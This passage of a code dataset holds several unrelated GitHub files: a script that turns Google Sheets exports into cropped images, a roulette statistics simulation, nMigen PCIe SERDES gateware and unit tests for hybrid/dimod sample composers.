str(int(sheetID)) != str(sheetID):\n raise ValueError(\"Invalid sheet ID\")\n if not re.match(r'^\\w+$', spreadsheetID):\n raise ValueError(\"Invalid spreadsheet ID\")\n\n print (\"Downloading sheet...\")\n url = (\"https://docs.google.com/spreadsheets/d/\" + spreadsheetID + \n OPTS + \"&gid=\" + str(sheetID)) \n print(url)\n with open(output, 'wb') as file: \n crl = pycurl.Curl() \n crl.setopt(crl.CAINFO,certifi.where())\n # Set URL value\n crl.setopt(crl.URL, url) \n crl.setopt(crl.FOLLOWLOCATION, True)\n # Write bytes that are utf-8 encoded\n crl.setopt(crl.WRITEDATA, file)\n\n # Perform a file transfer \n crl.perform() \n\n # End curl session\n crl.close()\n\n\n\nfrom pdf2image import convert_from_path, convert_from_bytes\n\nfrom pdf2image.exceptions import (\n PDFInfoNotInstalledError,\n PDFPageCountError,\n PDFSyntaxError\n)\n\n#path of pdf, cropRect is percentage of rectangle.\n#e.g. [0.1, 0.2, 0.5, 0.7] will crop the left 10%, right 50%, top 20% and bottom 30%\ndef convertPdf(path, name, cropRect):\n print (\"Opening \" + path)\n filename = os.path.basename(path)\n images = convert_from_path(path,dpi=400)\n #only get first page!\n image = images[0]\n \n print(\"Saving \" + name)\n width, height = image.size\n x,y,x2,y2 = cropRect\n newRect = [x*width, y*height, x2*width, y2*height]\n newRect = [int(item) for item in newRect]\n image = image.crop(newRect)\n image.save(name)\n\ndef processConfig(data):\n result = []\n for sectionName in data:\n section = data[sectionName]\n spreadsheetID = section['spreadsheet_id']\n sheetID = section['sheet_id']\n pdfName = 'output/' + sectionName+'.pdf'\n downloadFile(pdfName,spreadsheetID,sheetID)\n images = section['images']\n for image in images:\n convertPdf(pdfName, 'output/'+image, images[image])\n result.append('output/'+image)\n return result\n \nif __name__ == '__main__':\n try:\n os.mkdir('output')\n except:\n pass\n with open('config.json') as f:\n data = json.load(f)\n processConfig(data)", "repo_name": "alex-ong/CTMBracketScreenshot", "sub_path": "screenshot.py", "file_name": "screenshot.py", "file_ext": "py", "file_size_in_byte": 2568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.match", "line_number": 21, "usage_type": "call"}, {"api_name": "pycurl.Curl", "line_number": 29, "usage_type": "call"}, {"api_name": "certifi.where", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pdf2image.convert_from_path", "line_number": 58, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 86, "usage_type": "call"}, {"api_name": "json.load", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "18928479415", "text": "import random as rnd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef ruleta():\r\n\treturn rnd.randint(0,36)\r\n\r\ndef calcVP(results):\r\n\tc = 0\r\n\tfor j in results:\r\n\t\tc += j\r\n\treturn c/len(results)\r\n\r\niteraciones = 1000\r\nnumSim = 7\r\n\r\nfr = []\r\nvp = []\r\nv = []\r\nde = []\r\npromedio= [[],[],[],[]]\r\nfor i in range(iteraciones):\r\n\tpromedio[0].append(0)\r\n\tpromedio[1].append(0)\r\n\tpromedio[2].append(0)\r\n\tpromedio[3].append(0)\r\n\r\nfor j in range(numSim):\r\n\tx = rnd.randint(0,36)\r\n\tresults = []\r\n\tfrecRelativas = []\r\n\tvaloresProm = []\r\n\tdesvios = []\r\n\tvarianzas = []\r\n\tfor i in range(iteraciones):\r\n\t\tresult = 
ruleta()\r\n\t\tresults.append(result)\r\n\t\tfrecRelativas.append(results.count(x)/len(results))\r\n\t\tpromedio[0][i]=promedio[0][i]+results.count(x)/len(results)/numSim\r\n\t\tvaloresProm.append(calcVP(results))\r\n\t\tpromedio[1][i]=promedio[1][i]+calcVP(results)/numSim\r\n\t\tvar = np.var(results)\r\n\t\tvarianzas.append(var)\r\n\t\tpromedio[2][i]=promedio[2][i]+var/numSim\r\n\t\tdesvios.append(var**(1/2))\r\n\t\tpromedio[3][i]=promedio[3][i]+var**(1/2)/numSim\r\n\tfr.append(frecRelativas)\r\n\tvp.append(valoresProm)\r\n\tv.append(varianzas)\r\n\tde.append(desvios)\r\n\r\nfor i in range(numSim):\r\n\tplt.plot(fr[i], color='black')\r\nplt.plot(promedio[0], color='red')\r\nplt.hlines(1/37,0,iteraciones)\r\nplt.axis([0,iteraciones,0,0.4])\r\nplt.title(\"Frecuencia Relativa\")\r\nplt.ylabel('Fr del numero')\r\nplt.xlabel('n')\r\nplt.show()\r\n\r\nfor i in range(numSim):\r\n\tplt.plot(vp[i], color='black')\r\nplt.plot(promedio[1], color='red')\r\nplt.hlines(18,0,iteraciones)\r\nplt.title(\"Valor Promedio\")\r\nplt.ylabel('Valor medio')\r\nplt.xlabel('n')\r\nplt.show()\r\n\r\nfor i in range(numSim):\r\n\tplt.plot(v[i], color='black')\r\nplt.plot(promedio[2], color='red')\r\nplt.hlines(114,0,iteraciones)\r\nplt.title(\"Varianza\")\r\nplt.ylabel('Varianza')\r\nplt.xlabel('n')\r\nplt.show()\r\n\r\nfor i in range(numSim):\r\n\tplt.plot(de[i], color='black')\r\nplt.plot(promedio[3], color='red')\r\nplt.hlines(114**(1/2),0,iteraciones)\r\nplt.title(\"Desvío Estándar\")\r\nplt.ylabel('Desvío')\r\nplt.xlabel('n')\r\nplt.show()\r\n", "repo_name": "lautarocano/TP-Ruleta", "sub_path": "TP1-promedio.py", "file_name": "TP1-promedio.py", "file_ext": "py", "file_size_in_byte": 2017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randint", "line_number": 6, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 64, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "27292891839", "text": "from nmigen import *\nfrom nmigen.build import *\nfrom nmigen.hdl.ast import Part\nfrom nmigen.lib.fifo import AsyncFIFOBuffered\nfrom nmigen.lib.cdc import FFSynchronizer\n\nfrom enum import IntEnum\n\nfrom .align import SymbolSlip\nfrom .lfsr import PCIeLFSR\n\n\n__all__ = [\"PCIeSERDESInterface\", \"PCIeSERDESAligner\", \"PCIeScrambler\"]\n\n\ndef K(x, y): return (1 << 8) | (y << 5) | x\ndef D(x, y): return (0 << 8) | (y << 5) | x\n\nclass 
Ctrl(IntEnum):\n PAD = K(23, 7)\n STP = K(27, 7) # Start Transaction Layer Packet\n SKP = K(28, 0) # Skip\n FTS = K(28, 1) # Fast Training Sequence\n SDP = K(28, 2) # Start Data Link Layer Packet\n IDL = K(28, 3) # Idle\n COM = K(28, 5) # Comma\n EIE = K(28, 7) # Electrical Idle Exit\n END = K(29, 7)\n EDB = K(30, 7) # End Bad\n\nclass LinkSpeed(IntEnum):\n S2_5 = 1, # Speed of 2.5 GT/s, multiply timers by 2 by left shifting them by one bit\n S5_0 = 0, # Speed of 5 GT/s\n \n\n\n\nclass PCIeSERDESInterface(Elaboratable): # From Yumewatari\n \"\"\"\n Interface of a single PCIe SERDES pair, connected to a single lane. Uses 1:**ratio** gearing\n for configurable **ratio**, i.e. **ratio** symbols are transmitted per clock cycle.\n\n Parameters\n ----------\n ratio : int\n Gearbox ratio.\n\n rx_invert : Signal\n Assert to invert the received bits before 8b10b decoder.\n rx_align : Signal\n Assert to enable comma alignment state machine, deassert to lock alignment.\n rx_present : Signal\n Asserted if the receiver has detected signal.\n rx_locked : Signal\n Asserted if the receiver has recovered a valid clock.\n rx_aligned : Signal\n Asserted if the receiver has aligned to the comma symbol.\n\n rx_symbol : Signal(9 * ratio)\n Two 8b10b-decoded received symbols, with 9th bit indicating a control symbol.\n rx_valid : Signal(ratio)\n Asserted if the received symbol has no coding errors. If not asserted, ``rx_data`` and\n ``rx_control`` must be ignored, and may contain symbols that do not exist in 8b10b coding\n space.\n\n tx_locked : Signal\n Asserted if the transmitter is generating a valid clock.\n\n tx_symbol : Signal(9 * ratio)\n Symbol to 8b10b-encode and transmit, with 9th bit indicating a control symbol.\n tx_set_disp : Signal(ratio)\n Assert to indicate that the 8b10b encoder should choose an encoding with a specific\n running disparity instead of using its state, specified by ``tx_disp``.\n tx_disp : Signal(ratio)\n Assert to transmit a symbol with positive running disparity, deassert for negative\n running disparity.\n tx_e_idle : Signal(ratio)\n Assert to transmit Electrical Idle for that symbol.\n\n det_enable : Signal\n Rising edge starts the Receiver Detection test. Transmitter must be in Electrical Idle\n when ``det_enable`` is asserted.\n det_valid : Signal\n Asserted to indicate that the Receiver Detection test has finished, deasserted together\n with ``det_enable``.\n det_status : Signal\n Valid when ``det_valid`` is asserted. 
Indicates whether a receiver has been detected\n on this lane.\n \n frequency : int\n Maximum frequency in Hz\n speed : Signal()\n LinkSpeed enum value, indicates current speed\n \"\"\"\n def __init__(self, ratio=1):\n self.ratio = ratio\n\n self.rx_invert = Signal()\n self.rx_align = Signal()\n self.rx_present = Signal()\n self.rx_locked = Signal()\n self.rx_aligned = Signal()\n\n self.rx_symbol = Signal(ratio * 9)\n self.rx_valid = Signal(ratio)\n\n self.tx_symbol = Signal(ratio * 9)\n self.tx_set_disp = Signal(ratio)\n self.tx_disp = Signal(ratio)\n self.tx_e_idle = Signal(ratio)\n self.tx_locked = Signal()\n\n self.det_enable = Signal()\n self.det_valid = Signal()\n self.det_status = Signal()\n\n self.frequency = 0\n self.speed = Signal()\n\n self.reset = Signal()\n\n def elaborate(self, platform: Platform) -> Module:\n m = Module()\n return m\n\n\nclass PCIeSERDESAligner(PCIeSERDESInterface):\n \"\"\"\n A multiplexer that aligns commas to the first symbol of the word, for SERDESes that only\n perform bit alignment and not symbol alignment.\n \"\"\"\n def __init__(self, lane : PCIeSERDESInterface):\n self.ratio = lane.ratio\n\n self.rx_invert = lane.rx_invert\n self.rx_align = lane.rx_align\n self.rx_present = lane.rx_present\n self.rx_locked = lane.rx_locked\n self.rx_aligned = lane.rx_aligned\n\n self.rx_symbol = Signal(lane.ratio * 9)\n self.rx_valid = Signal(lane.ratio)\n\n self.tx_symbol = Signal(lane.ratio * 9)\n self.tx_set_disp = Signal(lane.ratio)\n self.tx_disp = Signal(lane.ratio)\n self.tx_e_idle = Signal(lane.ratio)\n\n self.det_enable = lane.det_enable\n self.det_valid = lane.det_valid\n self.det_status = lane.det_status\n\n self.frequency = lane.frequency\n self.speed = lane.speed\n\n self.reset = lane.reset\n\n self.__lane = lane\n\n def elaborate(self, platform: Platform) -> Module:\n m = Module()\n\n # Do TX CDC\n # FFSynchronizer\n if False:\n m.submodules += FFSynchronizer(Cat(self.tx_symbol, self.tx_set_disp, self.tx_disp, self.tx_e_idle), Cat(self.__lane.tx_symbol, self.__lane.tx_set_disp, self.__lane.tx_disp, self.__lane.tx_e_idle), o_domain=\"tx\", stages=4)\n \n # No CDC\n # TODO: Check if this actually works\n if False:\n m.d.comb += Cat(self.__lane.tx_symbol, self.__lane.tx_set_disp, self.__lane.tx_disp, self.__lane.tx_e_idle).eq(\n Cat(self.tx_symbol, self.tx_set_disp, self.tx_disp, self.tx_e_idle))\n\n # AsyncFIFOBuffered\n if True:\n tx_fifo = m.submodules.tx_fifo = AsyncFIFOBuffered(width=self.ratio * 12, depth=8, r_domain=\"tx\", w_domain=\"rx\")\n m.d.comb += tx_fifo.w_data.eq(Cat(self.tx_symbol, self.tx_set_disp, self.tx_disp, self.tx_e_idle))\n m.d.comb += Cat(self.__lane.tx_symbol, self.__lane.tx_set_disp, self.__lane.tx_disp, self.__lane.tx_e_idle).eq(tx_fifo.r_data)\n m.d.comb += tx_fifo.r_en.eq(1)\n m.d.comb += tx_fifo.w_en.eq(1)\n\n # Testing symbols\n if False:\n m.d.comb += self.__lane.tx_symbol.eq(Cat(Ctrl.COM, D(10, 2)))\n\n\n self.slip = SymbolSlip(symbol_size=10, word_size=self.__lane.ratio, comma=Cat(Ctrl.COM, 1))\n m.submodules += self.slip\n\n m.d.comb += [\n self.slip.en.eq(self.rx_align),\n self.slip.i.eq(Cat(\n (self.__lane.rx_symbol.word_select(n, 9), self.__lane.rx_valid[n])\n for n in range(self.__lane.ratio)\n )),\n self.rx_symbol.eq(Cat(\n Part(self.slip.o, 10 * n, 9)\n for n in range(self.__lane.ratio)\n )),\n self.rx_valid.eq(Cat(\n self.slip.o[10 * n + 9]\n for n in range(self.__lane.ratio)\n )),\n ]\n return m\n\n\nclass PCIeScrambler(PCIeSERDESInterface):\n \"\"\"\n Scrambler and Descrambler for PCIe, needs to be after an 
aligner\n \"\"\"\n def __init__(self, lane : PCIeSERDESInterface, enable = Signal()):\n self.ratio = lane.ratio\n\n self.rx_invert = lane.rx_invert\n self.rx_align = lane.rx_align\n self.rx_present = lane.rx_present\n self.rx_locked = lane.rx_locked\n self.rx_aligned = lane.rx_aligned\n\n self.rx_symbol = Signal(lane.ratio * 9)\n self.rx_valid = Signal(lane.ratio)\n\n self.tx_symbol = Signal(lane.ratio * 9)\n self.tx_set_disp = Signal(lane.ratio)\n self.tx_disp = Signal(lane.ratio)\n self.tx_e_idle = Signal(lane.ratio)\n\n self.det_enable = lane.det_enable\n self.det_valid = lane.det_valid\n self.det_status = lane.det_status\n\n self.enable = enable\n\n self.frequency = lane.frequency\n self.speed = lane.speed\n \n self.reset = lane.reset\n\n self.__lane = lane\n\n def elaborate(self, platform: Platform) -> Module:\n m = Module()\n\n # Scramble transmitted and received data, skip on SKP, reset on COM\n # TODO: Add case for when only one SKP character is received\n\n def scramble(input, output, enable):\n lfsr = PCIeLFSR(self.ratio, input[0:9] == Ctrl.COM, input[9:18] != Ctrl.SKP)\n m.submodules += lfsr \n with m.If(enable & (input[8] == 0)):\n m.d.rx += output[0:9].eq(lfsr.output[0:9] ^ input[0:9])\n with m.Else():\n m.d.rx += output[0:9].eq(input[0:9])\n \n with m.If(enable & (input[17] == 0)):\n with m.If(input[0:9] == Ctrl.COM): # TODO: This is a hack. Please fix.\n m.d.rx += output[9:18].eq(0xFF ^ input[9:18])\n with m.Else():\n m.d.rx += output[9:18].eq(lfsr.output[9:18] ^ input[9:18])\n if (self.ratio > 2):\n for i in range(2, self.ratio):\n m.d.rx += output[9 * i : 9 * i + 9].eq(Mux(input[9 * i : 9 * i + 9][8], 0, lfsr.output[9 * i : 9 * i + 9]) ^ input[9 * i : 9 * i + 9])\n with m.Else():\n for i in range(1, self.ratio):\n m.d.rx += output[9 * i : 9 * i + 9].eq(input[9 * i : 9 * i + 9])\n \n\n #with m.If(self.enable & (self.__lane.rx_symbol[8] == 0)):\n # with m.If(self.__lane.rx_symbol[0:9] == Ctrl.COM):\n # m.d.rx += self.rx_symbol.eq(0x1FE00 ^ self.__lane.rx_symbol)\n # with m.Else():\n # m.d.rx += self.rx_symbol.eq(rx_lfsr.output ^ self.__lane.rx_symbol)\n #with m.Else():\n # m.d.rx += self.rx_symbol.eq(self.__lane.rx_symbol)\n\n scramble(self.__lane.rx_symbol, self.rx_symbol, 1)\n scramble(self.tx_symbol, self.__lane.tx_symbol, self.enable)\n\n # This is necessary because the scrambling already takes one clock cycle\n m.d.rx += self.rx_valid.eq(self.__lane.rx_valid)\n\n #with m.If(self.enable & (self.tx_symbol[8] == 0)):\n # with m.If(self.tx_symbol[0:9] == Ctrl.COM):\n # m.d.rx += self.__lane.tx_symbol.eq(0x1FE00 ^ self.tx_symbol)\n # with m.Else():\n # m.d.rx += self.__lane.tx_symbol.eq(tx_lfsr.output ^ self.tx_symbol)\n #with m.Else():\n # m.d.rx += self.__lane.tx_symbol.eq(self.tx_symbol)\n\n m.d.rx += self.__lane.tx_set_disp.eq(self.tx_set_disp)\n m.d.rx += self.__lane.tx_disp .eq(self.tx_disp)\n m.d.rx += self.__lane.tx_e_idle .eq(self.tx_e_idle)\n\n return m", "repo_name": "usbalex/ECP5-PCIe", "sub_path": "Gateware/ecp5_pcie/serdes.py", "file_name": "serdes.py", "file_ext": "py", "file_size_in_byte": 10941, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.IntEnum", "line_number": 19, "usage_type": "name"}, {"api_name": "enum.IntEnum", "line_number": 31, "usage_type": "name"}, {"api_name": "nmigen.lib.cdc.FFSynchronizer", "line_number": 166, "usage_type": "call"}, {"api_name": "nmigen.lib.fifo.AsyncFIFOBuffered", "line_number": 176, "usage_type": "call"}, {"api_name": "align.SymbolSlip", 
"line_number": 187, "usage_type": "call"}, {"api_name": "nmigen.hdl.ast.Part", "line_number": 197, "usage_type": "call"}, {"api_name": "lfsr.PCIeLFSR", "line_number": 249, "usage_type": "call"}, {"api_name": "lfsr.output", "line_number": 252, "usage_type": "attribute"}, {"api_name": "lfsr.output", "line_number": 260, "usage_type": "attribute"}, {"api_name": "lfsr.output", "line_number": 263, "usage_type": "attribute"}]} +{"seq_id": "42679460587", "text": "import itertools\nimport unittest\n\nimport numpy as np\nimport networkx as nx\nfrom plucky import pluck\n\nimport dimod\n\nfrom hybrid.core import State, States, SampleSet\nfrom hybrid import traits\nfrom hybrid.composers import (\n IdentityComposer, SplatComposer, GreedyPathMerge,\n MergeSamples, ExplodeSamples, SliceSamples, AggregatedSamples,\n IsoenergeticClusterMove)\nfrom hybrid.utils import min_sample, max_sample, random_sample\n\n\nclass TestIdentityComposer(unittest.TestCase):\n problem = dimod.BinaryQuadraticModel({}, {'ab': 1, 'bc': 1, 'ca': 1}, 0, dimod.SPIN)\n samples = [{'a': 1, 'b': 1, 'c': -1}]\n\n def test_default(self):\n \"\"\"Subsamples are copied to samples.\"\"\"\n\n state = State(\n subproblem=None,\n subsamples=SampleSet.from_samples_bqm(self.samples, self.problem))\n\n nextstate = IdentityComposer().next(state)\n self.assertEqual(state.subsamples, nextstate.samples)\n\n def test_traits_enforced(self):\n \"\"\"Sample composers require `problem`, `samples` and `subsamples`.\"\"\"\n\n with self.assertRaises(traits.StateTraitMissingError):\n IdentityComposer().run(State()).result()\n with self.assertRaises(traits.StateTraitMissingError):\n IdentityComposer().run(State(problem=True)).result()\n with self.assertRaises(traits.StateTraitMissingError):\n IdentityComposer().run(State(problem=True, samples=True)).result()\n self.assertTrue(\n IdentityComposer().run(State(problem=True, samples=True, subsamples=True)).result())\n\n\nclass TestSplatComposer(unittest.TestCase):\n problem = dimod.BinaryQuadraticModel({}, {'ab': 1, 'bc': 1, 'ca': 1}, 0, dimod.SPIN)\n samples = [{'a': +1, 'b': +1, 'c': +1},\n {'a': -1, 'b': -1, 'c': -1}]\n subproblem = dimod.BinaryQuadraticModel({}, {'bc': 1}, 0, dimod.SPIN)\n subsamples = [{'b': -1, 'c': +1},\n {'b': +1, 'c': +1}]\n composed = [{'a': +1, 'b': -1, 'c': +1},\n {'a': -1, 'b': +1, 'c': +1}]\n\n def test_default(self):\n \"\"\"All subsamples are combined with all the samples.\"\"\"\n\n state = State.from_samples(self.samples, self.problem).updated(\n subproblem=self.subproblem,\n subsamples=SampleSet.from_samples_bqm(self.subsamples, self.subproblem))\n\n nextstate = SplatComposer().next(state)\n\n self.assertEqual(nextstate.samples,\n SampleSet.from_samples_bqm(self.composed, self.problem))\n\n def test_dtype(self):\n bqm = dimod.BQM.from_ising({'a': 0}, {})\n init = State.from_problem(bqm)\n state = init.updated(subsamples=init.samples)\n\n nextstate = SplatComposer().next(state)\n\n init_dtype = state.samples.record.sample.dtype\n next_dtype = nextstate.samples.record.sample.dtype\n self.assertEqual(init_dtype, next_dtype)\n\n def test_traits_enforced(self):\n \"\"\"Sample composers require `problem`, `samples` and `subsamples`.\"\"\"\n\n with self.assertRaises(traits.StateTraitMissingError):\n SplatComposer().run(State()).result()\n with self.assertRaises(traits.StateTraitMissingError):\n SplatComposer().run(State(problem=True)).result()\n self.assertTrue(\n # problem and samples are included by default\n SplatComposer().run(State(\n problem=self.problem, 
subproblem=self.subproblem,\n samples=SampleSet.from_samples_bqm(self.samples, self.problem),\n subsamples=SampleSet.from_samples_bqm(self.subsamples, self.subproblem))).result())\n\n\nclass TestGreedyPathMerge(unittest.TestCase):\n\n def test_basic(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1, 'bc': -1, 'ca': 1}, 0, dimod.SPIN)\n state = State.from_sample(min_sample(bqm), bqm)\n antistate = State.from_sample(max_sample(bqm), bqm)\n\n result = GreedyPathMerge().run(States(state, antistate)).result()\n\n self.assertEqual(result.samples.first.energy, -3.0)\n\n\nclass TestMergeSamples(unittest.TestCase):\n\n def test_single(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1}, 0, dimod.SPIN)\n\n states = States(State.from_sample({'a': 1, 'b': -1}, bqm))\n\n state = MergeSamples().run(states).result()\n\n self.assertEqual(state, states[0])\n\n def test_multiple(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1}, 0, dimod.SPIN)\n\n states = States(State.from_sample({'a': 1, 'b': -1}, bqm),\n State.from_sample({'a': -1, 'b': 1}, bqm))\n\n expected = State.from_samples([{'a': 1, 'b': -1}, {'a': -1, 'b': 1}], bqm)\n\n state = MergeSamples().run(states).result()\n\n self.assertEqual(state, expected)\n\n def test_aggregation(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1}, 0, dimod.SPIN)\n\n states = States(State.from_sample({'a': 1, 'b': -1}, bqm),\n State.from_sample({'a': 1, 'b': -1}, bqm))\n\n expected = State(\n problem=bqm,\n samples=dimod.SampleSet.from_samples_bqm(\n {'a': 1, 'b': -1}, bqm, num_occurrences=[2]))\n\n state = MergeSamples(aggregate=True).run(states).result()\n\n self.assertEqual(state, expected)\n\n\nclass TestExplodeSamples(unittest.TestCase):\n\n def test_empty(self):\n \"At least one input sample is required.\"\n\n bqm = dimod.BQM.from_ising({}, {'ab': 1})\n\n inp = State(problem=bqm, samples=None)\n with self.assertRaises(ValueError):\n ExplodeSamples().run(inp).result()\n\n inp = State(problem=bqm, samples=SampleSet.empty())\n with self.assertRaises(ValueError):\n ExplodeSamples().run(inp).result()\n\n def test_single(self):\n \"One input sample should produce one output state with that sample.\"\n\n bqm = dimod.BQM.from_ising({}, {'ab': 1})\n\n inp = State.from_sample({'a': 1, 'b': 1}, bqm)\n\n exp = States(inp.updated())\n\n out = ExplodeSamples().run(inp).result()\n\n self.assertEqual(out, exp)\n\n def test_simple(self):\n \"Two output states created for two input samples, in correct order.\"\n\n bqm = dimod.BQM.from_ising({}, {'ab': 1})\n\n inp = State.from_samples([{'a': 1, 'b': 1},\n {'a': -1, 'b': 1}], bqm)\n\n exp = States(State.from_sample({'a': 1, 'b': 1}, bqm),\n State.from_sample({'a': -1, 'b': 1}, bqm))\n\n out = ExplodeSamples().run(inp).result()\n\n self.assertEqual(out, exp)\n\n\nclass TestSliceSamples(unittest.TestCase):\n\n def test_bottom_n(self):\n energies = list(range(10))\n sampleset = dimod.SampleSet.from_samples(np.ones((10, 1)), dimod.SPIN, energy=energies)\n state = State(samples=sampleset)\n\n bottom = SliceSamples(3).run(state).result()\n self.assertEqual(bottom.samples, sampleset.truncate(3))\n\n bottom = SliceSamples().run(state, stop=3).result()\n self.assertEqual(bottom.samples, sampleset.truncate(3))\n\n def test_top_n(self):\n energies = list(range(10))\n sampleset = dimod.SampleSet.from_samples(np.ones((10, 1)), dimod.SPIN, energy=energies)\n state = State(samples=sampleset)\n\n top = SliceSamples(-3, None).run(state).result()\n self.assertTrue((top.samples.record.energy == energies[-3:]).all())\n\n top = 
SliceSamples().run(state, start=-3).result()\n self.assertTrue((top.samples.record.energy == energies[-3:]).all())\n\n def test_middle_n(self):\n energies = list(range(10))\n sampleset = dimod.SampleSet.from_samples(np.ones((10, 1)), dimod.SPIN, energy=energies)\n state = State(samples=sampleset)\n\n mid = SliceSamples(3, -3).run(state).result()\n self.assertTrue((mid.samples.record.energy == energies[3:-3]).all())\n\n mid = SliceSamples(1, -1).run(state, start=3, stop=-3).result()\n self.assertTrue((mid.samples.record.energy == energies[3:-3]).all())\n\n\nclass TestAggregatedSamples(unittest.TestCase):\n\n def test_aggregation(self):\n energies = list(range(10))\n sampleset = dimod.SampleSet.from_samples(np.ones((10, 1)), dimod.SPIN, energy=energies)\n state = State(samples=sampleset)\n\n result = AggregatedSamples(aggregate=True).run(state).result()\n\n self.assertEqual(len(result.samples), 1)\n self.assertEqual(result.samples.record.sample, np.array([1]))\n\n def test_spread(self):\n energies = [1, 2]\n occurrences = [3, 2]\n sampleset = dimod.SampleSet.from_samples(\n [{'a': 1}, {'a': 2}], dimod.SPIN,\n energy=energies, num_occurrences=occurrences)\n state = State(samples=sampleset)\n\n result = AggregatedSamples(aggregate=False).run(state).result()\n\n # we'll have n=5 samples\n n = sum(occurrences)\n self.assertEqual(len(result.samples), n)\n\n # samples, energies and num_occurrences must be expanded\n np.testing.assert_array_equal(result.samples.record.sample,\n np.array([[1], [1], [1], [2], [2]]))\n np.testing.assert_array_equal(result.samples.record.energy,\n np.array([1, 1, 1, 2, 2]))\n np.testing.assert_array_equal(result.samples.record.num_occurrences,\n np.ones(n))\n\n # variables should stay the same\n self.assertEqual(list(sampleset.variables), list(result.samples.variables))\n\n\nclass TestICM(unittest.TestCase):\n\n @staticmethod\n def total_energy(states):\n \"\"\"Combined energy of all samples in all states.\"\"\"\n 